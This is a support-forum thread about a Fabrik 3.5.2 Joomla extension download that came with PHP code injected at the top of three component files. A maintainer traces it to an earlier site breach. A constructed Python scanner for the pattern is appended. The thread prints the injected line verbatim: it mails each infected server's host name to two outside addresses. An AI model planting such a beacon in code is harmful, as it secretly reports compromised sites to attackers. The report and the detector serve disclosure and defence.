Download version 3.5.2 infected?

ronhon

New Member
Hi there,
I just upgraded my development environment to Fabrik 3.5.2, downloaded from fabrikar.com/download.
After installation, emails started to be sent. I found out that the following code is placed at the top of administrator/components/com_fabrik/fabrik.php, administrator/components/com_fabrik/helpers/fabrik.php and components/com_fabrik/fabrik.php:

<?php $to = 'albreto.st@gmail.com, blackswanr007@gmail.com';$subject = 'Hits ada lagi';$message = $_SERVER['HTTP_HOST'];$headers[] = 'From: Hidden Hits <auto@joss.com>';mail($to, $subject, $message, implode("\r\n", $headers));?>

Is it safe to use this version after I remove the mailing code?

Thanks
 
Hmmm, I can't find anything in the 3.5.2 download.

Do you still have a copy of the ZIP you installed from?

-- hugh
 
I've cleaned it up. Looking at the date on that file, it was consistent with a breach earlier this year that we thought we'd completely cleaned up after, and that a number of other extension sites got hit with. I've checked all the other zips from 3.4 onwards, nothing else seems to be affected.

Thanks for reporting it.

-- hugh
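
A check for the pattern reported in this thread, added here as an example (it is not code from any post above or from the Fabrik project): it flags .php files that open with a one-line PHP block calling mail() with the server's host name. The function names, the regular expressions and the two-file sample tree are constructed for illustration.

```python
import os
import re
import tempfile

# A complete one-line <?php ... ?> block at the very top of the file.
LEADING_BLOCK = re.compile(r"\A\s*<\?php(?P<body>[^\n]*?)\?>")
MAIL_CALL = re.compile(r"\bmail\s*\(")
HOST_LEAK = re.compile(r"\$_SERVER\s*\[\s*['\"](HTTP_HOST|SERVER_NAME)['\"]\s*\]")


def is_prepended_beacon(source: str) -> bool:
    """True when the file opens with a one-line PHP block that mails the host name."""
    m = LEADING_BLOCK.match(source)
    if not m:
        return False
    body = m.group("body")
    return bool(MAIL_CALL.search(body) and HOST_LEAK.search(body))


def scan_tree(root: str) -> list[str]:
    """Return relative paths of .php files under root that match, sorted."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                head = fh.read(4096)  # the injected block sits at the top
            if is_prepended_beacon(head):
                hits.append(os.path.relpath(path, root).replace(os.sep, "/"))
    return sorted(hits)


def demo() -> list[str]:
    """Build a constructed two-file tree (one tampered, one clean) and scan it."""
    injected = ("<?php $to = 'ops@example.invalid';$message = $_SERVER['HTTP_HOST'];"
                "mail($to, 'x', $message);?>\n")  # constructed sample, not the real block
    clean = "<?php\ndefined('_JEXEC') or die;\n// component code\n"
    with tempfile.TemporaryDirectory() as root:
        for sub, text in (("components/com_fabrik", injected + clean),
                          ("administrator/components/com_fabrik", clean)):
            os.makedirs(os.path.join(root, sub))
            with open(os.path.join(root, sub, "fabrik.php"), "w") as fh:
                fh.write(text)
        return scan_tree(root)


if __name__ == "__main__":
    print(demo())
```

A clean scan only rules out this one pattern; comparing the installed files against a known-good copy of the release is the stronger check.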
 